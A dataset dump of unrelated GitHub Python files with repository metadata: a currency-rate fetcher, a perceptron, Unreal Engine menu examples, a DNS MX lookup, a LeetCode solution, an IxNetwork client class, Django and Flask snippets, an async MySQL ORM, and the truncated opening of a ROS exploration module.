44c81d8cc9c148c93cf9a77faec345693059c973
|
/fetch.py
|
568adf1e9271c6ebe976f93a3b0c8306a2ea428a
|
[] |
no_license
|
neoatlantis/currency-data
|
26566a5131b814f324153db451ae9f879fda9b72
|
c19bc94d6d6ba6706f625e94e176b77bee455b04
|
refs/heads/master
| 2020-06-10T19:02:58.973856
| 2016-12-08T06:35:46
| 2016-12-08T06:35:46
| 75,902,576
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,231
|
py
|
#!/usr/bin/env python
import os
import time
import requests
import shelve
import sys
BASEPATH = os.path.realpath(os.path.dirname(sys.argv[0]))
filepath = lambda *i: os.path.join(BASEPATH, *i)
# check for api key
try:
apikeyFilepath = filepath('apikey')
apikey = open(apikeyFilepath).read().strip()
except:
print "Put your API key at `openexchangerates.org` into file `apikey`."
sys.exit(1)
# check for database
db = shelve.open(filepath('currencies.db'), flag='c')
latest = 0
for key in db:
timestamp = float(key)
if timestamp > latest:
latest = timestamp
if time.time() - latest < 3000 and 'force' not in sys.argv:
print "You are requesting too frequent. Abandoned to prevent API",
print "exhaustion. Use `force` in command line to force a request."
db.close()
sys.exit(2)
# fetch url
url = "https://openexchangerates.org/api/latest.json?app_id=%s" % apikey
try:
req = requests.get(url)
if req.status_code != 200: raise
json = req.json()
json = {
'rates': json['rates'],
'timestamp': json['timestamp']
}
except:
print "Failed fetching newest data. Abort."
sys.exit(3)
print json
db[str(time.time())] = json
db.close()
sys.exit(0)
|
[
"contact@chaobai.li"
] |
contact@chaobai.li
|
796a852c4ccdd0bc598e0b373567c854094d0cfd
|
45fb509bf21ac003a40fd404d7c0cc995e741672
|
/perceptron_algorithm/perceptron_algo_2nd_method.py
|
59807adb1a2c854110b8644f2b103f49899851f4
|
[] |
no_license
|
FarahAgha/MachineLearning
|
0d17511f7495190dfd2368554428208c7d0eadf7
|
cf385135e016a63fb16bd326586fcd8ecb3c4355
|
refs/heads/master
| 2021-01-04T01:03:08.810401
| 2020-03-15T18:42:16
| 2020-03-15T18:42:16
| 240,314,331
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,011
|
py
|
# Perceptron Algorithm perceptron_algo_2nd_method.py
# See https://medium.com/@thomascountz/19-line-line-by-line-python-perceptron-b6f113b161f3 for details.
import numpy as np
class Perceptron(object):
def __init__(self, no_of_inputs, threshold=100, learning_rate=0.01):
self.threshold = threshold
self.learning_rate = learning_rate
self.weights = np.zeros(no_of_inputs + 1)
def predict(self, inputs):
summation = np.dot(inputs, self.weights[1:]) + self.weights[0]
if summation > 0:
activation = 1
else:
activation = 0
return activation
def train(self, training_inputs, labels):
for _ in range(self.threshold):
for inputs, label in zip(training_inputs, labels):
prediction = self.predict(inputs)
self.weights[1:] += self.learning_rate * (label - prediction) * inputs
self.weights[0] += self.learning_rate * (label - prediction)
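# Usage sketch (editor's addition, not part of the original file): learn the
# AND function from its truth table with the two-input setup above.
if __name__ == "__main__":
    training_inputs = [np.array([0, 0]), np.array([0, 1]),
                       np.array([1, 0]), np.array([1, 1])]
    labels = np.array([0, 0, 0, 1])
    perceptron = Perceptron(no_of_inputs=2)
    perceptron.train(training_inputs, labels)
    print(perceptron.predict(np.array([1, 1])))  # expected output: 1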
|
[
"you@example.com"
] |
you@example.com
|
f85417abce36ad169336e4c143d0ed7ba2a666ea
|
1082d5cde908e101c51f69923212dcae4b4b60f4
|
/examples/sub_menu.py
|
9d7901f2f97b295d736199ba1b9a578957e289d8
|
[
"MIT"
] |
permissive
|
SaxonRah/UnrealEnginePython
|
88039c62024d01672138c4adeecac0fc9729bed0
|
d5f3b2e7a42209af31cbbd47377633e8d452439c
|
refs/heads/master
| 2021-01-04T23:56:44.556697
| 2020-02-16T00:38:43
| 2020-02-16T00:38:43
| 240,805,780
| 7
| 1
|
MIT
| 2020-02-16T00:03:20
| 2020-02-16T00:03:19
| null |
UTF-8
|
Python
| false
| false
| 1,313
|
py
|
import unreal_engine as ue
def open_submenu001(builder):
builder.begin_section('submenu001', 'i am a tooltip')
builder.add_menu_entry('sub_one', 'tooltip', lambda: ue.log('hello from submenu001'))
builder.add_menu_entry('sub_one_2', 'tooltip 2', lambda: ue.log('hello again'))
builder.end_section()
def open_sub_submenu(builder):
builder.begin_section('sub_submenu003', 'i am a tooltip for the submenu')
builder.add_menu_entry('sub_sub_three', 'tooltip', lambda: ue.log('hello from sub_submenu003'))
builder.end_section()
def open_submenu002(builder):
builder.begin_section('submenu002', 'i am a tooltip')
builder.add_menu_entry('sub_two', 'tooltip', lambda: ue.log('hello from submenu002'))
builder.add_sub_menu('sub sub menu', 'tooltip !', open_sub_submenu)
builder.end_section()
def open_menu(builder):
builder.begin_section('test1', 'test2')
builder.add_menu_entry('one', 'two', lambda: ue.log('ciao 1'))
builder.add_sub_menu('i am a submenu', 'tooltip for the submenu', open_submenu001)
builder.add_menu_entry('three', 'four', lambda: ue.log('ciao 2'))
builder.add_sub_menu('i am another submenu', 'tooltip for the second submenu', open_submenu002)
builder.end_section()
ue.add_menu_bar_extension('SimpleMenuBarExtension', open_menu)
|
[
"roberto.deioris@gmail.com"
] |
roberto.deioris@gmail.com
|
d77e5c51f77650cf17fab3e34a6d2b3c30310516
|
7672706c2d285a6eef5689381eef56dc3d6e779c
|
/assignment4_4.py
|
26bd85ba5395ef34dd76a3c0e7795f494e26d6ae
|
[] |
no_license
|
AreRex14/netprog-assignment
|
3fbf2f949d774f3a957297d5cb11f18b94e00815
|
1057bc2485a98c260320dc45c01c91a3e3a6ef18
|
refs/heads/master
| 2020-12-26T21:27:11.902369
| 2020-02-01T17:29:00
| 2020-02-01T17:29:00
| 237,649,985
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 656
|
py
|
import dns.resolver
import json
def MX_lookup(host):
answers = dns.resolver.query(host, 'MX')
servers = []
for rdata in answers:
servers.append((rdata.preference, rdata.exchange))
servers_pref_ascend = sorted(servers, key=lambda server: server[0])
return servers_pref_ascend
def JSON_lookup(host):
    answers = dns.resolver.query(host, 'MX')
    servers = []
    for rdata in answers:
        # str() makes the dns.name.Name exchange value JSON-serializable
        servers.append((rdata.preference, str(rdata.exchange)))
    # json.dumps returns a JSON string; json.dump writes to a file object
    data = json.dumps(servers, indent=4)
    return data
if __name__ == '__main__':
host = input("Enter a domain name to look up: ")
mail_servers = MX_lookup(host)
for s in mail_servers:
print(s)
|
[
"arerifxynwa@gmail.com"
] |
arerifxynwa@gmail.com
|
9a29224011fd3cca3b90735ed27fe0b1c8ed6bb9
|
699b767e854162231914f4bce177382a9880f221
|
/LinkedList/AddTwoNumbers.py
|
7f503cc9821d09b900119e244d002187998d27d2
|
[] |
no_license
|
XiwangLi/LeetcodeArchive
|
a66dc32f0a7248ff05cbe09dd0095191fefc602f
|
3de4a48f9f7de2970cf02751c1620281bae0947d
|
refs/heads/master
| 2021-04-28T02:57:55.604505
| 2019-02-28T01:07:51
| 2019-02-28T01:07:51
| 122,128,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 540
|
py
|
class Solution(object):
def addTwoNumbers(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
head=ListNode(0)
curr=head
        val=0
while l1 or l2 or val:
if l1:
val+=l1.val
l1=l1.next
if l2:
val+=l2.val
l2=l2.next
curr.next=ListNode(val%10)
curr=curr.next
val=val//10
return head.next
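# Editor's addition: LeetCode normally supplies ListNode, so a minimal stub and
# a usage sketch are included here to make the snippet self-contained.
class ListNode(object):
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def build_list(digits):
    # build a linked list from digits stored least-significant first
    head = ListNode(0)
    curr = head
    for d in digits:
        curr.next = ListNode(d)
        curr = curr.next
    return head.next

if __name__ == "__main__":
    # 342 + 465 = 807, with digits stored in reverse order
    node = Solution().addTwoNumbers(build_list([2, 4, 3]), build_list([5, 6, 4]))
    out = []
    while node:
        out.append(node.val)
        node = node.next
    print(out)  # [7, 0, 8]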
|
[
"xiwangli2010@gmail.com"
] |
xiwangli2010@gmail.com
|
3b4b65765a6275e2b4fed60d9412aac3f7fb9665
|
d12b59b33df5c467abf081d48e043dac70cc5a9c
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/quicktest/passcriteria_985f11fda90dc3b8dac84a4a881b8740.py
|
6920d6cfe8478b76037b42d0c156e50d2daa5519
|
[
"MIT"
] |
permissive
|
ajbalogh/ixnetwork_restpy
|
59ce20b88c1f99f95a980ff01106bda8f4ad5a0f
|
60a107e84fd8c1a32e24500259738e11740069fd
|
refs/heads/master
| 2023-04-02T22:01:51.088515
| 2021-04-09T18:39:28
| 2021-04-09T18:39:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,492
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class PassCriteria(Base):
"""This applies the Pass Criteria to each trial in the test and determines whether the trial passed or failed.
The PassCriteria class encapsulates a required passCriteria resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'passCriteria'
_SDM_ATT_MAP = {
'EnablePassFail': 'enablePassFail',
}
def __init__(self, parent):
super(PassCriteria, self).__init__(parent)
@property
def EnablePassFail(self):
"""
Returns
-------
- bool: If true, the pass fail criteria is set.
"""
return self._get_attribute(self._SDM_ATT_MAP['EnablePassFail'])
@EnablePassFail.setter
def EnablePassFail(self, value):
self._set_attribute(self._SDM_ATT_MAP['EnablePassFail'], value)
def update(self, EnablePassFail=None):
"""Updates passCriteria resource on the server.
Args
----
- EnablePassFail (bool): If true, the pass fail criteria is set.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def Apply(self):
"""Executes the apply operation on the server.
Applies the specified Quick Test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('apply', payload=payload, response_object=None)
def ApplyAsync(self):
"""Executes the applyAsync operation on the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyAsync', payload=payload, response_object=None)
def ApplyAsyncResult(self):
"""Executes the applyAsyncResult operation on the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyAsyncResult', payload=payload, response_object=None)
def ApplyITWizardConfiguration(self):
"""Executes the applyITWizardConfiguration operation on the server.
Applies the specified Quick Test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('applyITWizardConfiguration', payload=payload, response_object=None)
def GenerateReport(self):
"""Executes the generateReport operation on the server.
        Generate a PDF report for the last successful test run.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('generateReport', payload=payload, response_object=None)
def Run(self, *args, **kwargs):
"""Executes the run operation on the server.
Starts the specified Quick Test and waits for its execution to finish.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
run(InputParameters=string)list
-------------------------------
- InputParameters (str): The input arguments of the test.
- Returns list(str): This method is synchronous and returns the result of the test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('run', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
"""Executes the start operation on the server.
Starts the specified Quick Test.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(InputParameters=string)
-----------------------------
- InputParameters (str): The input arguments of the test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self):
"""Executes the stop operation on the server.
Stops the currently running Quick Test.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('stop', payload=payload, response_object=None)
def WaitForTest(self):
"""Executes the waitForTest operation on the server.
Waits for the execution of the specified Quick Test to be completed.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
return self._execute('waitForTest', payload=payload, response_object=None)
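# Usage sketch (editor's addition; assumes an established ixnetwork_restpy
# session in which `quick_test` is a Quick Test node exposing this resource):
#   pass_criteria = quick_test.PassCriteria
#   pass_criteria.EnablePassFail = True   # triggers the setter, updating the server
#   pass_criteria.Apply()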
|
[
"andy.balogh@keysight.com"
] |
andy.balogh@keysight.com
|
1a406e49cacab5c4dcd0d7e60c97c70a3b1a7a36
|
bb05e1fafef1a62b85d5c97f10c9557cf7a240cc
|
/task_07_01.py
|
5bf2d6e493ddc44f970bb650a0474271f3285a79
|
[] |
no_license
|
Nafani4/Home_work
|
3bbc192dc6a43c40fd0358dfec863241e7b3ab96
|
69ce5d4321b3fc6b4bf4db7191912c3d4f4f8907
|
refs/heads/master
| 2021-05-16T03:31:23.457108
| 2017-11-26T21:11:30
| 2017-11-26T21:11:30
| 105,476,626
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 199
|
py
|
def fibonacci(num):
x, y = 0, 1
for i in range(num):
x, y = y, x + y
yield x
if __name__ == '__main__':
    print(list(fibonacci(10)))  # list() materializes the generator for printing
    for i in fibonacci(10):
        print(i)
|
[
"grebennikov.mikhail@gmail.com"
] |
grebennikov.mikhail@gmail.com
|
b6061c81fb9c14cfe8a4b4a93e891fc90327de11
|
38444340385ab91a9148b10db3a981246b4496ff
|
/app/forms.py
|
cf23a56282b7fbe1de24973ded5f0f3faf55254e
|
[] |
no_license
|
dannzii/info3180-lab3
|
e27d7e82b18c27402f4e32ff2c8857f72b728b44
|
9a8c14c83ac8bad1c1895e05ebf03430caed6464
|
refs/heads/master
| 2020-04-22T06:15:11.017922
| 2019-02-14T20:28:16
| 2019-02-14T20:28:16
| 170,184,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField
from wtforms.validators import DataRequired, Email
class ContactForm(FlaskForm):
name = StringField('Name', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
subject = StringField('Subject', validators=[DataRequired()])
Text_Area = TextAreaField('Message', validators=[DataRequired()])
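# Usage sketch (editor's addition; assumes a Flask app with SECRET_KEY
# configured and a hypothetical /contact view handling the POST):
#   form = ContactForm()
#   if form.validate_on_submit():
#       flash('Message from ' + form.name.data + ' received')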
|
[
"34076867+dannzii@users.noreply.github.com"
] |
34076867+dannzii@users.noreply.github.com
|
5e3d18247eb1b3e3f1789add50668361ee4ebffd
|
f894c0969d30437b27ef4d0d81a99660bab10716
|
/learn_python/Day1/assignment1/quickpython.py
|
ee38744c52832b0503f6d108f472fea9ba41d649
|
[] |
no_license
|
AnandSankarR/Data_BootCamp_2018
|
364357e73a47e60990fd43dd37f427823f0b40ab
|
c5e4f818722864f8f56df5387a9f9cbe849ae3e4
|
refs/heads/master
| 2021-05-03T13:01:31.131736
| 2018-02-22T00:56:25
| 2018-02-22T00:56:25
| 120,506,879
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25
|
py
|
print("This File Works")
|
[
"anandsankar.r@gmail.com"
] |
anandsankar.r@gmail.com
|
80830d2c4527373672b28a60f6897f9622dbb64d
|
4b2df7b62246133fd3c8af2529f6544dcf2b4350
|
/pushups/migrations/0005_auto_20181011_1118.py
|
b591fed36590ad62240012ec288faed71fe7cbe2
|
[] |
no_license
|
MrMacchew/LOL_CTS
|
24b0904f2a4b2934d0c386511c269684cfe3b3ca
|
cf9c7e434d73365aded766ac8703cb02ddd06104
|
refs/heads/master
| 2020-04-01T03:02:19.267620
| 2018-10-20T07:51:37
| 2018-10-20T07:51:37
| 152,806,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
# Generated by Django 2.1.1 on 2018-10-11 17:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pushups', '0004_auto_20181011_1113'),
]
operations = [
migrations.AlterField(
model_name='match',
name='accountId',
field=models.IntegerField(default=None),
),
]
|
[
"mattcain@weber.edu"
] |
mattcain@weber.edu
|
30bf23cbb12bb828a340c74a0d91fa08a504b30e
|
777e23a382d7dd84232795a929c4004c768d1837
|
/www/orm.py
|
beb91d24c8bdbfe88c890b3f0be0725751427fef
|
[] |
no_license
|
Altkaka/Altkaka-Web
|
542126c2ec72453fb1ca8495892ef1bd4282f2e7
|
64773d579aa3097a1b3af2d071358105f388cf04
|
refs/heads/master
| 2021-05-04T19:14:23.648750
| 2017-10-12T08:40:16
| 2017-10-12T08:40:16
| 106,657,692
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,659
|
py
|
import logging; logging.basicConfig(level = logging.INFO)
import asyncio
import aiomysql
from myapis import APIError
from myapis import *
async def create_pool(loop, **kw):
logging.info('create database connection pool...')
global __pool
__pool = await aiomysql.create_pool(
host = kw.get('host','localhost'),
port = kw.get('port',3306),
user = kw['user'],
password = kw['password'],
db = kw['db'],
charset = kw.get('charset', 'utf8'),
autocommit = kw.get('autocommit', True),
maxsize = kw.get('maxsize', 10),
minsize = kw.get('minsize', 1),
loop = loop
)
async def select(sql, args, size=None):
logging.info('select : SQL: %s', sql)
logging.info('select : args: %s', args)
global __pool
async with __pool.get() as conn:
async with conn.cursor(aiomysql.DictCursor) as cur:
await cur.execute(sql.replace('?', '%s'), args or ())
if size:
rs = await cur.fetchmany(size)
else:
rs = await cur.fetchall()
logging.info('row returned: %s' % len(rs))
return rs
async def execute(sql, args, autocommit = True):
# logging.info('execute:SQL:',sql, 'args:',args)
# global __pool
# with (yield from __pool) as conn:
# try:
# cur = yield from conn.cursor()
# yield from cur.execute(sql.replace('?', '%s'), args)
# affected = cur.rowcount
# yield from cur.close()
# except BaseException as e:
# raise
# logging.ERROR(e.__context__)
# return affected
logging.info('execute : SQL: %s', sql)
logging.info('execute : args: %s', args)
global __pool
async with __pool.get() as conn:
if not autocommit:
await conn.begin()
try:
async with conn.cursor(aiomysql.DictCursor) as cur:
await cur.execute(sql.replace('?', '%s'), args)
affected = cur.rowcount
await cur.close()
if not autocommit:
await conn.commit()
logging.info('commit success!')
except BaseException as e:
if not autocommit:
await conn.rollback()
raise
finally:
conn.close()
        logging.info('rows returned: %s ' % affected)
        return affected
def create_args_string(num):
    # build a "?,?,...,?" placeholder list of the given length
    return '?'+',?'*(num-1)
class ModelMetaclass(type):
def __new__(cls, name, bases, attrs):
if name == 'Model':
return type.__new__(cls, name, bases, attrs)
tableName = attrs.get('__table__', None) or name
logging.info('found model: %s (table: %s)' % (name, tableName))
mappings = dict()
fields = []
primaryKey = None
for k, v in attrs.items():
if isinstance(v, Field):
logging.info('found mapping: %s ==> %s' % (k, v))
mappings[k] = v
if v.primary_key:
if primaryKey:
raise APIError('Duplicate primary key for field: %s' % k)
primaryKey = k
else:
fields.append(k)
if not primaryKey:
raise APIError('Primary key not found.')
for k in mappings.keys():
attrs.pop(k)
escaped_fields = list(map(lambda f: '`%s`' % f, fields))
attrs['__mappings__'] = mappings
attrs['__table__'] = tableName
attrs['__primary_key__'] = primaryKey
attrs['__fields__'] = fields
        # The backticks in the SQL statements below guard against errors when a field name collides with a reserved word; when writing MySQL statements by hand, field names are usually quoted for the same reason.
attrs['__select__'] = 'select `%s`, %s from `%s`' % (primaryKey, ','.join(escaped_fields), tableName)
attrs['__insert__'] = 'insert into `%s` (%s, `%s`) values (%s)' % (tableName, ','.join(escaped_fields), primaryKey, create_args_string(len(escaped_fields)+1))
attrs['__update__'] = 'update `%s` set %s where `%s`=?' % (tableName, ','.join(map(lambda f: '`%s`=?' % (mappings.get(f).name or f), fields)), primaryKey)
attrs['__delete__'] = 'delete from `%s` where `%s` = ?' % (tableName, primaryKey)
return type.__new__(cls, name, bases, attrs)
class Model(dict, metaclass=ModelMetaclass):
def __init__(self, **kw):
super(Model, self).__init__(**kw)
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(r"'Model' object has no attribute '%s' " % key)
def __setattr__(self, key, value):
self[key] = value
def getValue(self, key):
return getattr(self, key, None)
def getValueOrDefault(self, key):
value = getattr(self, key, None)
if value is None:
field = self.__mappings__[key]
if field.default is not None:
value = field.default() if callable(field.default) else field.default
logging.debug('using default value for %s:%s' % (key, str(value)))
setattr(self, key, value)
return value
@classmethod
    # look up a record by its primary key
async def find(cls, pk):
rs = await select('%s where `%s` = ?' % (cls.__select__, cls.__primary_key__), [pk], 1)
if len(rs) == 0:
return None
logging.info('find rs:%s',rs[0])
return cls(**rs[0])
async def save(self):
args = list(map(self.getValueOrDefault, self.__fields__))
args.append(self.getValueOrDefault(self.__primary_key__))
rows = await execute(self.__insert__, args)
if rows != 1:
            logging.warning('failed to insert record: affected rows: %s' % rows)
@classmethod
    # findAll() - query records matching the given WHERE conditions
async def findAll(cls, **kw):
order_flag = False
order_values = ''
limit_flag = False
limit_values = ()
        logging.info('find-all begin')
logging.info('find-all: %s-%d', kw, len(kw))
if has_orders(kw):
order_flag = True
order_values = kw[has_orders(kw)]
kw.pop(has_orders(kw))
if has_limit(kw):
limit_flag = True
limit_values = kw[has_limit(kw)]
kw.pop(has_limit(kw))
        values = list(kw.values())
        if limit_flag:
            # only append limit bounds when a limit clause was actually supplied
            values.append(limit_values[0])
            values.append(limit_values[1])
if len(kw)==0:
if order_flag and limit_flag:
rs = await select('%s order by %s limit ? , ?' % (cls.__select__, order_values), values)
elif order_flag and not limit_flag:
rs = await select('%s order by %s' % (cls.__select__, order_values), list(kw.values()))
elif not order_flag and limit_flag:
rs = await select('%s limit ? , ?' % cls.__select__,values)
else:
rs = await select('%s ' % cls.__select__ , args=None)
else:
if order_flag and limit_flag:
rs = await select('%s where %s order by %s limit ? , ?' % (cls.__select__, str_to_where(kw), order_values), values)
elif order_flag and not limit_flag:
rs = await select('%s where %s order by %s' % (cls.__select__, str_to_where(kw), order_values), list(kw.values()))
elif not order_flag and limit_flag:
rs = await select('%s where %s limit ? , ?' % (cls.__select__, str_to_where(kw)),values)
else:
rs = await select('%s where %s' % (cls.__select__, str_to_where(kw)), list(kw.values()))
if len(rs) == 0:
return None
logging.info('find-all end results: %s',rs)
return [cls(**r) for r in rs]
@classmethod
    # findNumber() - query with the given WHERE conditions but return an integer; intended for select count(*) style SQL
async def findNumber(cls, **kw):
if len(kw)==0:
logging.info('%s' % cls.__select__)
rs = await select('select count(*) from %s' % cls.__table__, args=None)
else:
rs = await select('select count(*) from %s where %s' % (cls.__table__, str_to_where(kw)), list(kw.values()))
        if len(rs) == 0:
            return None
        logging.info('findnumber:%s', rs[0]['count(*)'])
        return rs[0]['count(*)']
    # update a record by its primary key
async def update(self):
args = list(map(self.getValueOrDefault, self.__fields__))
args.append(self.getValueOrDefault(self.__primary_key__))
rows = await execute(self.__update__, args)
return rows
    # delete a record by its primary key
async def remove(self):
args=[]
args.append(self.getValueOrDefault(self.__primary_key__))
rows = await execute(self.__delete__, args)
return rows
class Field(object):
def __init__(self, name, column_type, primary_key, default):
self.name = name
self.column_type = column_type
self.primary_key = primary_key
self.default = default
def __str__(self):
return '<%s, %s:%s>' % (self.__class__.__name__, self.column_type, self.name)
class StringField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='varchar(100)'):
super().__init__(name, ddl, primary_key, default)
class TinyIntField(Field):
def __init__(self, name=None, primary_key=False, default = None, ddl='tinyint'):
super().__init__(name, ddl, primary_key, default)
class SmallIntField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='smallint'):
super().__init__(name, ddl, primary_key, default)
class MediumIntField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='mediumint'):
super().__init__(name, ddl, primary_key, default)
class IntField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='int'):
super().__init__(name, ddl, primary_key, default)
class BigIntField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='bigint'):
super().__init__(name, ddl, primary_key, default)
class FloatField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='float'):
super().__init__(name, ddl, primary_key, default)
class DoubleField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='double'):
super().__init__(name, ddl, primary_key, default)
class DecimalField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='decimal(19,2)'):
super().__init__(name, ddl, primary_key, default)
class CharStringField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='char(100)'):
super().__init__(name, ddl, primary_key, default)
class TinyBlobField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='tinyblob'):
super().__init__(name, ddl, primary_key, default)
class TinyTextField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='tinytext'):
super().__init__(name, ddl, primary_key, default)
class BlobField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='blob'):
super().__init__(name, ddl, primary_key, default)
class TextField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='text'):
super().__init__(name, ddl, primary_key, default)
class MediumBlobField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='mediumblob'):
super().__init__(name, ddl, primary_key, default)
class MediumTextField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='mediumtext'):
super().__init__(name, ddl, primary_key, default)
class LongBlobField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='longblob'):
super().__init__(name, ddl, primary_key, default)
class longTextField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='longtext'):
super().__init__(name, ddl, primary_key, default)
class VarBinaryField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='varbinary(100)'):
super().__init__(name, ddl, primary_key, default)
class BinaryField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='binary(100)'):
super().__init__(name, ddl, primary_key, default)
class DateField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='date'):
super().__init__(name, ddl, primary_key, default)
class TimeField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='time'):
super().__init__(name, ddl, primary_key, default)
class YearField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='year'):
super().__init__(name, ddl, primary_key, default)
class DateTimeField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='datetime'):
super().__init__(name, ddl, primary_key, default)
class TimeStampField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='timestamp'):
super().__init__(name, ddl, primary_key, default)
class BooleanField(Field):
def __init__(self, name=None, primary_key=False, default=None, ddl='boolean'):
super().__init__(name, ddl, primary_key, default)
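# Usage sketch (editor's addition, not part of the original file; assumes a
# reachable MySQL server with a `users` table whose columns match the fields):
class User(Model):
    __table__ = 'users'
    id = IntField(name='id', primary_key=True)
    name = StringField(name='name', default='anonymous')

async def _demo(loop):
    await create_pool(loop, user='www-data', password='www-data', db='test')
    await User(id=1, name='Alice').save()   # insert one row
    print(await User.find(1))               # fetch it back by primary key

# loop = asyncio.get_event_loop(); loop.run_until_complete(_demo(loop))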
|
[
"dongjiwukl@163.com"
] |
dongjiwukl@163.com
|
23c8d69f239e68820d41f4185adcd5f0106ad42c
|
799a1bbafe9ceb6fcf6530d176633a7f97980dad
|
/rosExploration/rrt_exploration/scripts/functions.py
|
ff7a90d07e7e15a5893aa3a916f02fcd97deeea5
|
[
"MIT"
] |
permissive
|
dingjianfeng/rosExplorationNew
|
e6598ed4b0907d7bc8740acf4ea05d8bae9a1524
|
53b8b6bcdd3372c5e6fbaecae9f66f266dcf70c0
|
refs/heads/master
| 2021-09-01T06:38:27.366634
| 2017-12-25T11:45:22
| 2017-12-25T11:45:22
| 115,333,542
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,206
|
py
|
#!/usr/bin/env python
#coding=utf-8
import rospy
import tf
from numpy import array
import actionlib
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from nav_msgs.srv import GetPlan
from geometry_msgs.msg import PoseStamped
from numpy import floor
from numpy.linalg import norm
from numpy import inf
#________________________________________________________________________________
class robot:
goal = MoveBaseGoal()
start = PoseStamped()
end = PoseStamped()
def __init__(self,name):
self.assigned_point=[]
self.name=name
